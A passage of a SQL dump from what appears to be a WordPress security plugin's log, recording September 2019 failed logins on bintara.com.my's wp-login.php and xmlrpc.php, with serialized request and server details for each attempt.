09:06:10',18256824,19555632,'https://bintara.com.my/xmlrpc.php',1,0,'148.72.23.181'),(23847,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"204.15.133.176\";s:11:\"REMOTE_PORT\";s:5:\"37022\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX4B2@oTLkHKFi2qF7Ed-gAAAAw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568539100.0309\";s:12:\"REQUEST_TIME\";s:10:\"1568539100\";}}','notice','2019-09-15 09:18:21','2019-09-15 09:18:20',17740480,19231120,'https://bintara.com.my/wp-login.php',1,0,'204.15.133.176'),(23848,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"204.15.133.176\";s:11:\"REMOTE_PORT\";s:5:\"37440\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX4B3qPPIU0WjPk-sOuWEQAAAZE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568539102.7281\";s:12:\"REQUEST_TIME\";s:10:\"1568539102\";}}','notice','2019-09-15 09:18:24','2019-09-15 09:18:23',18257424,19555480,'https://bintara.com.my/xmlrpc.php',1,0,'204.15.133.176'),(23849,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"166.62.123.55\";s:11:\"REMOTE_PORT\";s:5:\"51542\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX4EYqPPIU0WjPk-sOuXpgAAAY0\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568539746.9939\";s:12:\"REQUEST_TIME\";s:10:\"1568539746\";}}','notice','2019-09-15 09:29:08','2019-09-15 09:29:07',17740512,19232040,'https://bintara.com.my/wp-login.php',1,0,'166.62.123.55'),(23850,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"166.62.123.55\";s:11:\"REMOTE_PORT\";s:5:\"51988\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX4EZaPPIU0WjPk-sOuXpwAAAZU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568539749.7695\";s:12:\"REQUEST_TIME\";s:10:\"1568539749\";}}','notice','2019-09-15 09:29:11','2019-09-15 09:29:10',18258672,19555824,'https://bintara.com.my/xmlrpc.php',1,0,'166.62.123.55'),(23851,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"68.183.173.177\";s:11:\"REMOTE_PORT\";s:5:\"56030\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX4HUOoTLkHKFi2qF7Ee@QAAAA4\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568540496.1475\";s:12:\"REQUEST_TIME\";s:10:\"1568540496\";}}','notice','2019-09-15 09:41:37','2019-09-15 09:41:36',17740720,19232808,'https://bintara.com.my/wp-login.php',1,0,'68.183.173.177'),(23852,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"68.183.173.177\";s:11:\"REMOTE_PORT\";s:5:\"56528\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX4HU6PPIU0WjPk-sOuZBAAAAY4\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568540499.2648\";s:12:\"REQUEST_TIME\";s:10:\"1568540499\";}}','notice','2019-09-15 09:41:40','2019-09-15 09:41:39',18257128,19554704,'https://bintara.com.my/xmlrpc.php',1,0,'68.183.173.177'),(23853,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"213.32.91.71\";s:11:\"REMOTE_PORT\";s:5:\"46921\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX4My6PPIU0WjPk-sOub-gAAAZY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568541899.8644\";s:12:\"REQUEST_TIME\";s:10:\"1568541899\";}}','notice','2019-09-15 10:05:02','2019-09-15 10:05:00',17738920,19231400,'https://bintara.com.my/wp-login.php',1,0,'213.32.91.71'),(23854,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"213.32.91.71\";s:11:\"REMOTE_PORT\";s:5:\"47281\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX4Mz@esTgPVjZVPWmsPLwAAANc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568541904.077\";s:12:\"REQUEST_TIME\";s:10:\"1568541904\";}}','notice','2019-09-15 10:05:06','2019-09-15 10:05:04',18257336,19553960,'https://bintara.com.my/xmlrpc.php',1,0,'213.32.91.71'),(23931,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"50.63.167.184\";s:11:\"REMOTE_PORT\";s:5:\"38370\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX6hOOesTgPVjZVPWmspuAAAAMc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568579896.959\";s:12:\"REQUEST_TIME\";s:10:\"1568579896\";}}','notice','2019-09-15 20:38:20','2019-09-15 